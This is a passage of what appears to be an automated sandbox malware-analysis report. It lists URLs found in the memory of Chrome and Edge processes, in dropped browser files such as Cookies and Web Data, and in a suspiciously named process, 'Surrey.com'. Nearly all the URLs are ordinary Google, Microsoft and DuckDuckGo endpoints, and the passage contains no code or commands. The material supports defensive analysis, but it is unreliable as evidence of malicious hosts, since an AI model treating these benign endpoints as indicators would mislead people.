Source: chrome.exe, 00000013.00000003.2767897495.0000203401B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827261354.0000203401B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2767988556.0000203401B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp$
Source: chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappx
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000013.00000002.2820323001.0000203400D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultd
Source: chrome.exe, 00000013.00000003.2767897495.0000203401B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827261354.0000203401B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2767988556.0000203401B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/ogl
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815164149.0000203400504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: manifest.json0.26.dr String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.26.dr String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.26.dr String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.26.dr String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000013.00000003.2739699547.000020340120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.26.dr String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2d
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000013.00000002.2823694505.0000203400F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2814700305.00002034003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824232931.00002034010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: Surrey.com, 0000000D.00000002.3588082989.0000000006007000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3587128325.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp, v3w47q.13.dr, v37ycb.13.dr, Web Data.26.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Surrey.com, 0000000D.00000002.3588082989.0000000006007000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3587128325.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp, v3w47q.13.dr, v37ycb.13.dr, Web Data.26.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab%
Source: chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: Surrey.com, 0000000D.00000002.3588082989.0000000006007000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3587128325.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, v3w47q.13.dr, v37ycb.13.dr, Web Data.26.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log7.26.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log7.26.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log7.26.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: chromecache_377.21.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_377.21.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_377.21.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_377.21.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/#
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/-
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/7
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/E
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/H
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Y
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/p
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/w
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/z
Source: chrome.exe, 00000013.00000002.2833313563.0000489800920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/&
Source: chrome.exe, 00000013.00000003.2724079938.0000489800878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2760039106.0000203401DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: msedge.exe, 00000018.00000002.2904824074.00004D94025B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.comu
Source: chrome.exe, 00000013.00000002.2815695014.0000203400628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: ny5pzu.13.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816977617.00002034007B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816977617.00002034007B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000013.00000002.2833256728.0000489800904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000013.00000002.2833256728.0000489800904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000013.00000002.2831196183.0000489800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardH
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000013.00000002.2833256728.0000489800904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000013.00000002.2833256728.0000489800904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000013.00000002.2814805075.000020340040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2750403309.000020340141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2752834457.0000203401364000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000013.00000003.2739414948.0000203400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739566795.000020340113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739699547.000020340120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000013.00000003.2739414948.0000203400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739566795.000020340113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739699547.000020340120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000013.00000003.2724128756.0000489800880000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739699547.000020340120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000013.00000002.2833313563.0000489800920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000013.00000002.2833313563.0000489800920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000013.00000002.2833227265.00004898008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000013.00000002.2814805075.000020340040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2750403309.000020340141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2752834457.0000203401364000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: chrome.exe, 00000013.00000002.2815827330.00002034006A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp4
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000013.00000002.2823694505.0000203400F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827475731.0000203401DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: msedge.exe, 00000018.00000002.2904824074.00004D94025B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000018.00000002.2904824074.00004D94025B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.com/
Source: Cookies.27.dr String found in binary or memory: https://msn.comXID/
Source: Cookies.27.dr String found in binary or memory: https://msn.comXIDv10?
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815164149.0000203400504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815854722.00002034006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000013.00000002.2815854722.00002034006B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822847002.0000203400E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000013.00000002.2822847002.0000203400E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonece
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000013.00000002.2823920418.0000203401020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000013.00000003.2736084867.0000203400FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818005553.000020340098F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: 000003.log4.26.dr String found in binary or memory: https://ntp.msn.com
Source: QuotaManager.26.dr String found in binary or memory: https://ntp.msn.com/_default
Source: QuotaManager.26.dr String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default)
Source: QuotaManager.26.dr String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default)/
Source: 2cc80dabc69f58b6_0.26.dr String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 00000018.00000002.2904824074.00004D94025B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://office.net/
Source: chrome.exe, 00000013.00000003.2752212784.000020340139C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000013.00000003.2785805100.00002034017EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyn
Source: chrome.exe, 00000013.00000003.2755360525.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000013.00000003.2752212784.000020340139C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000013.00000003.2752212784.000020340139C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000013.00000002.2818190866.00002034009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2813825782.000020340027C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000013.00000002.2822847002.0000203400E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
